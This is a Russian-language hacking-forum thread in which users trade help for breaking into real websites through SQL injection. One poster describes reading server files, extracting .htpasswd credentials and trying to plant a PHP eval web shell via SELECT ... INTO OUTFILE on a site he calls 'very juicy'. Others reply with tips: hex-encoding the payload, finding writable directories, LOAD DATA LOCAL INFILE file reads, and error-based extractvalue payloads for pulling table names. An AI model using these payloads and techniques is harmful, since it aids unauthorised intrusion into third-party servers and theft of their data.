Ваши вопросы по уязвимостям.

не знаю почему но пхпинфо вообще подчти нефига не показывает.
спасибо, через

Code:

echo dirname(__FILE__);

путь нашел

Code:

echo file_get_contents('config.php');

не читает конфиг. перепробовал уйму вариантов.
файл менеджер пишет 404, упрощеные шеллы не выполняются показывает исходный код,хотя файлы пхп с хело ворлд льются и запускаются как нужно...




да бы не плодить кучу сообщений

Code:

LOAD DATA LOCAL INFILE '/home/h41954/data/www/' INTO TABLE test FIELDS TERMINATED BY '\n'

я так понял LOAD DATA LOCAL INFILE работает на myslq до 5 ветки только?

 

нет, работает с 3 ветки. (с 3.22.6)
пхпхинфо в студию.

 

Вообщем случайно наткнулся на скуль, и решил попробовать крутануть ее. (havij'em))
Не буду ходить вокруг до около. Опишу сразу все что пробовал и что не получается.
Вообщем мускул работает от рута, на пользователя Root в мускуле даже пасса нет)
Читаются все файлы на сервере, причем не только файлы но и например в хавиже запрос на чтение по такому пути /usr/home/www/htdocs/
Вижу какие папки и файлы находятся в каталоге htdocs
Вообщем все папки и файлы читаются на сервере.
На самом сайте есть админка и она защищена .htpasswd
Читаю .htpasswd выдираю логин пасс, воожу , не пускает.
На сервере так же есть еще пару сайтов и везде в админку .htpasswd, но не пускает никуда(читал где то что в htaccess путь не правельно указан к htpasswd) вообще забил на такой способ попасть в админку.
Так же на сервере есть phpmyadmin, доступ к нему идет через htaccess
в файле .htaccess

Code:

<IfModule mod_auth.c>
  AuthName authorization
  AuthType Basic
  <IfModule mod_auth_pwcheck.c>
    AuthPwcheckActive On
    AuthPwcheckAuthoritative On
    require group rusers
    satisfy any
  </IfModule>
</IfModule>

Order deny,allow
Deny from all

<IfModule mod_charset.c>
  CharsetDisable On
</IfModule>

Собственно вариант попасть в phpmyadmin я тоже исключил.

Решил попробовать через функцию Query в хавиже залить мини шелл таким образом

Code:

SELECT '<?php eval($_REQUEST[cmd]);?>' into outfile '/tmp/123.php'

хавиж ошибку не выдал но и ничего вообще не произошло после запроса.
Сообственно файл тоже не создался в tmp
а да, забыл сообщить что FILE_PRIV = Y
Ребят, очень нужно залится на сайт этот) очень жирный и полезный сайт. Прошу помощи.
А еще попрошу не пинать за хавиж!)

 

странно. на 2х mysql 5.** ветки пишет что не поддерживается версией

 

попробуй в диру сайта лить, найти папку для записи, руками а не через хавиж, возможно глюк в нём!
Кстати, возможно ковычки ' вызывают ошибку, но хавиж может тебе и не показать, будешь руками запросы посылась сам увидешь в чём проблема!

 

я пробовал уже) лил в папки которые доступны для записи... ноль эффекта.
прочитал php.ini
magic_quotes=off
так что кавычки врятли тут роль играют)

 

сам пост/гет параметр можешь вызвать php ошибку, я не про фильтр говорю
Откуда ты узнал, что папки доступны на запись?

 

Ну вообще прочитал скрипт для залития изображений из админки. там четко написанно что картинки и файлы будут заливатся в ту папку( ну и сообственно в папке этой куча грязи всякой)
Ну а вообще я редко раньше встречал что бы /tmp/ была закрыта на запись)
Поможешь в аське если есть время конешно, не хочу тут позорится просто : ))

 

пиши в асю гляну, права mysql могут отличасть от php, и там где может залить пхп скрипт, мускул может не залить файл!

 

может быть она просто выключена? по дефолту, обычно, вкл.
присутствует в 5.7 и ниже http://dev.mysql.com/doc/refman/5.7/en/load-data.html

 

ребята кто знает как определить имя таблицы в sql инъекции error-based
ситуация: mysql 5.6.x , у найденой инъекций нет доступа с базе information_schema

Code:

&orderby=1+and+extractvalue(rand(),concat(0x3a,(select+version())))

но продвинутся дальше не получается не знаю префикса названия таблиц
вопрос как вызвать ошибку с названием таблицы в ней?

 

1. select table_name form information_schema.tables limit 1
2. За сколько акк купили

 

select table_name from information_schema.tables limit 1,1 вместо select version()
с такими вопросами вам лучше сначала почитать статьи

 

Ну во первых, как советуют выкинь Хавидж и сделай вручную.
К тому же переведи в HEX колонку к виду 0x0000000 и

SELECT 0x0000 INTO OUTFILE /path

К тому-же, tmp это который /tmp в корне сервера или в локации вебкорня? Тот что в корне сервера, на самом деле для всех должен быть доступен на запись, а вот любые, даже кешевые и тп директории внутри вебкорня для отличных от пользователя под которым работает php(etc) могут иметь права строго ограничивающие доступ

 

а блин забыл упомянуть что нет доступа с базе information_schema

 

Какого пост-запроса?
Стандартгая ситуация у Вас, вектор - error based:

 

вы уверены, что доступа нет? может просто фильтруется? других способов получения имен таблиц нет. кроме грубой силы, само собой

 

Во первых попробовать так: `information_schema`.xxx.
Во вторых, частенько бывает что права обрезают на information_schema.tables, стоит проверить information_schema.columns и выбирать оттуда

 

нет что то было это я точно помню мы как то в свое время определяли названия таблиц в mysql 4 там не было information_schema

да перебрал все таблицы из базы information_schema по нулям 99.9% нет доступа к information_schema